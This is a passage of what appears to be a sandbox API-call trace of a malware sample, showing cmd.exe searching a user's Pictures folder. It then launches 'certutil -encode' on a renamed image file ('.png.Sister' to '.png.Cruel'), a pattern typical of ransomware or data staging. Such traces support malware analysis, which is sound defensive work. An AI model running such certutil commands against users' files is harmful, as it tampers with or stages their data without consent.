GetProcessHeap () returned 0x21ed8c70000 [0299.803] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0860) returned 0x58 [0299.803] GetProcessHeap () returned 0x21ed8c70000 [0299.803] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b08d0 [0299.803] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0299.803] GetProcessHeap () returned 0x21ed8c70000 [0299.803] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7be40 [0299.803] ??_V@YAXPEAX@Z () returned 0x1 [0299.803] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0299.803] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ca60 [0299.803] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0299.804] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cf40 [0299.804] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0299.804] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xdd44437d, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdd44437d, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7c9a0 [0299.804] FindClose (in: hFindFile=0x21ed8c7c9a0 | out: hFindFile=0x21ed8c7c9a0) returned 1 [0299.805] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\lrXVOGLmm_sYY.png.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17cf8d10, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xbb62ea60, ftLastAccessTime.dwHighDateTime=0x1d5eac0, ftLastWriteTime.dwLowDateTime=0xbb62ea60, ftLastWriteTime.dwHighDateTime=0x1d5eac0, nFileSizeHigh=0x0, nFileSizeLow=0x1770f, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="lrXVOGLmm_sYY.png.Sister", cAlternateFileName="LRXVOG~1.SIS")) returned 0x21ed8c7ca60 [0299.806] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0299.807] _wcsnicmp (_String1="LRXVOG~1.SIS", _String2="lrXVOGLmm_sYY.png.Sister", _MaxCount=0x18) returned 18 [0299.807] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0299.807] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0299.807] GetProcessHeap () returned 0x21ed8c70000 [0299.807] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc8d50 [0299.807] ??_V@YAXPEAX@Z () returned 0x1 [0299.807] ??_V@YAXPEAX@Z () returned 0x1 [0299.807] GetProcessHeap () returned 0x21ed8c70000 [0299.807] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b08d0, Size=0x200) returned 0x21ed93b08d0 [0299.807] GetProcessHeap () returned 0x21ed8c70000 [0299.807] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b08d0) returned 0x200 [0299.807] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0299.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.807] GetFileType (hFile=0x50) returned 0x2 [0299.807] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.808] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0299.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.808] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0299.815] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0299.815] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0299.815] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0299.815] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0299.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.815] GetFileType (hFile=0x50) returned 0x2 [0299.815] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.815] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0299.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.816] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0299.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.816] GetFileType (hFile=0x50) returned 0x2 [0299.816] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.816] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0299.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.817] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93b0870*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed93b0870*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0299.817] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"lrXVOGLmm_sYY.png.Sister\" \"lrXVOGLmm_sYY.png.Cruel\" ") returned 62 [0299.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.817] GetFileType (hFile=0x50) returned 0x2 [0299.817] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.817] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0299.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.818] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x3e) returned 1 [0299.820] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0299.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.820] GetFileType (hFile=0x50) returned 0x2 [0299.820] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.820] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0299.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.821] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0299.825] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0299.826] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0299.826] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0299.826] malloc (_Size=0xffce) returned 0x21eda100000 [0299.826] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0299.826] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0299.826] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0299.826] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0299.826] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0299.826] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0299.826] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0299.826] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0299.826] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0299.826] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0299.826] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0299.826] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0299.826] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0299.826] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0299.826] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0299.826] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0299.827] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0299.827] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0299.827] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0299.827] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0299.827] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0299.827] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0299.827] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0299.827] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0299.827] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0299.827] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0299.827] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0299.827] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0299.827] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0299.827] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0299.827] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0299.827] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0299.827] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0299.827] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0299.827] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0299.827] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0299.827] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0299.827] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0299.827] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0299.827] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0299.827] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0299.827] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0299.828] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0299.828] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0299.828] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0299.829] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0299.829] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0299.829] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0299.829] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0299.829] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0299.829] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0299.829] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0299.829] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0299.830] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0299.830] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0299.830] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0299.830] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0299.830] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0299.830] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0299.830] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0299.830] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0299.830] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0299.830] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0299.830] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0299.830] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0299.831] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0299.831] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0299.831] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0299.831] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0299.831] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0299.831] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0299.831] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0299.831] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0299.831] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0299.831] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0299.831] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0299.831] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0299.831] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0299.831] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0299.831] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0299.831] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0299.831] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0299.831] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0299.831] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0299.831] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0299.831] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0299.831] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0299.831] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0299.832] ??_V@YAXPEAX@Z () returned 0x1 [0299.832] GetProcessHeap () returned 0x21ed8c70000 [0299.832] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cf98e0 [0299.832] GetProcessHeap () returned 0x21ed8c70000 [0299.832] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x9e) returned 0x21ed8d6af20 [0299.832] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0299.832] malloc (_Size=0xffce) returned 0x21eda100000 [0299.832] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0299.832] GetProcessHeap () returned 0x21ed8c70000 [0299.832] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8d098d0 [0299.834] SetErrorMode (uMode=0x0) returned 0x0 [0299.834] SetErrorMode (uMode=0x1) returned 0x0 [0299.834] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8d098e0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0xa6cf4fdb80*="Pictures") returned 0x18 [0299.834] SetErrorMode (uMode=0x0) returned 0x1 [0299.834] GetProcessHeap () returned 0x21ed8c70000 [0299.834] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d098d0, Size=0x54) returned 0x21ed8d098d0 [0299.834] GetProcessHeap () returned 0x21ed8c70000 [0299.834] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d098d0) returned 0x54 [0299.834] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0299.834] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0299.834] GetProcessHeap () returned 0x21ed8c70000 [0299.834] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1be) returned 0x21ed937d580 [0299.834] GetProcessHeap () returned 0x21ed8c70000 [0299.834] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36c) returned 0x21ed8d429f0 [0299.834] GetProcessHeap () returned 0x21ed8c70000 [0299.834] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d429f0, Size=0x1c0) returned 0x21ed937cc70 [0299.834] GetProcessHeap () returned 0x21ed8c70000 [0299.834] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937cc70) returned 0x1c0 [0299.834] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0299.835] GetProcessHeap () returned 0x21ed8c70000 [0299.835] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c75b00 [0299.835] GetProcessHeap () returned 0x21ed8c70000 [0299.835] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c75b00, Size=0x7e) returned 0x21ed8c75b00 [0299.835] GetProcessHeap () returned 0x21ed8c70000 [0299.835] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c75b00) returned 0x7e [0299.835] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0299.835] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0299.835] GetLastError () returned 0x2 [0299.836] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0299.836] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0299.837] GetLastError () returned 0x2 [0299.837] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0299.837] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cf40 [0299.837] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0299.837] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0299.837] GetLastError () returned 0x2 [0299.837] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cd00 [0299.837] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0299.838] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0299.838] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0299.838] ??_V@YAXPEAX@Z () returned 0x1 [0299.838] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0299.839] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0299.839] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0299.839] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0299.839] GetProcessHeap () returned 0x21ed8c70000 [0299.839] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45c20 [0299.839] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0299.839] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0299.839] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0299.839] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0299.839] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0299.839] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0299.839] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0299.839] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0299.839] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0299.839] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0299.839] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0299.839] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0299.839] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0299.839] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0299.840] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0299.841] GetProcessHeap () returned 0x21ed8c70000 [0299.841] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45c20) returned 1 [0299.841] GetProcessHeap () returned 0x21ed8c70000 [0299.841] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95560 [0299.841] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0299.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0299.841] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0299.841] _get_osfhandle (_FileHandle=0) returned 0x4c [0299.841] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0299.842] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"lrXVOGLmm_sYY.png.Sister\" \"lrXVOGLmm_sYY.png.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Pictures", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"lrXVOGLmm_sYY.png.Sister\" \"lrXVOGLmm_sYY.png.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, 